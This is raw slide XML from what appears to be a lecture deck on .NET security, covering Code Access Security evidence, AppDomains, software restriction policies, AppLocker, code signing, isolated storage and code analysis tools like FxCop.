                        <a:t>directory</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>The application's installation directory.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>Hash</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>Cryptographic hash </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>SHA1.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>Publisher</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400"/>
                        <a:t>Software publisher signature; that is, the Authenticode signer of the code. </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>Site</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400"/>
                        <a:t>Site of origin, such as http://www.microsoft.com.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>Strong name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400"/>
                        <a:t>Cryptographically strong name of the assembly.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>URL</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>URL of origin.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="es-US" sz="2400"/>
                        <a:t>Zone</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>origin </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0"/>
                        <a:t>such as Internet Zone.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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AppDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Managers</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1173779"/>
            <a:ext cx="8915400" cy="4967514"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In .NET, the basic unit of execution is NOT the process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>rather it is that of the Application Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>With </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppDomains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, multiple applications can run in the same process, thereby sharing the .NET runtime libraries.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>HostSecurityManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> class apply policy and permissions. This technique determines the security for the entire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at once.</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-US"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Restriction Policy</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1004090"/>
            <a:ext cx="8915400" cy="6444841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You can use software restriction policies to identify software and to control its ability to run on your local computer, organizational unit, domain, or site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control the ability of software to run on your system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Permit users to run only specific files on multiuser computers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control whether software restriction policies affect all users or just certain users on a computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cancel an application to run (virus)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="es-US"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Software Restriction Policies</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="506882" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="798934" y="999445"/>
            <a:ext cx="7658100" cy="5381625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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Sign the application</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="476162" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="775905"/>
            <a:ext cx="9144000" cy="6082095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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Set the publisher</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5969713"/>
            <a:ext cx="8915400" cy="535531"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Publish -&gt; Options</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="477186" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="448190" y="1101012"/>
            <a:ext cx="8695810" cy="4329403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373224" y="127000"/>
            <a:ext cx="8624726" cy="701731"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows Application Locker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="4819781"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AppLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, you can create rules to allow or deny applications from running like: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>executable files (.exe and .com), scripts (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .ps1, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and .bat), Windows Installer files (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), and DLL files (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ocx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Isolated Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="309563" y="1323975"/>
            <a:ext cx="6796087" cy="3162300"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Provides a virtual file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Allows quotas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Implements file system isolation based on:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Application identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>User identity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188420" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="627063" y="4995863"/>
            <a:ext cx="8077200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IsolatedStorageFile isoStore =</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lucida Sans Typewriter" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   IsolatedStorageFile.GetUserStoreForAssembly();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188423" name="Picture 7" descr="CdDvd_CdDvdMedia01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6970713" y="2659063"/>
            <a:ext cx="1565275" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188424" name="Picture 8" descr="CdDvd_CdDvdMedia01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7253288" y="2505075"/>
            <a:ext cx="1565275" cy="774700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188425" name="Picture 9" descr="CdDvd_CdDvdMedia01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6892925" y="2324100"/>
            <a:ext cx="1565275" cy="7747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4406900"/>
            <a:ext cx="7772400" cy="646331"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TOOLS to Help with security</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-US"/>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FXCop</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="819214"/>
            <a:ext cx="8915400" cy="5927777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>FxCop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a code analysis tool that checks .NET managed code assemblies for conformance to the Microsoft .NET Framework Design Guidelines. It inspect assemblies for more than 200 defects in the following areas: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Library design </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Globalization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Naming conventions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performance </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interoperability and portability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usage</a:t>
            </a:r>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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="127000"/>
            <a:ext cx="8870950" cy="1311128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.NET Code Access Security (CAS) Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107950" y="1584325"/>
            <a:ext cx="8915400" cy="3490186"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Code Access Security (CAS) is the .NET Common Language Runtime (CLR) mechanism for maintaining security based on the identity of code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>You need to sign the code, to add EXTERNAL configuration security to the application.</a:t>
            </a:r>
            <a:endParaRPr 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FxCop demo</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="508930" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="653143" y="812348"/>
            <a:ext cx="7769193" cy="6045652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Microsoft Code Analysis Tool .NET</a:t>
            </a:r>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
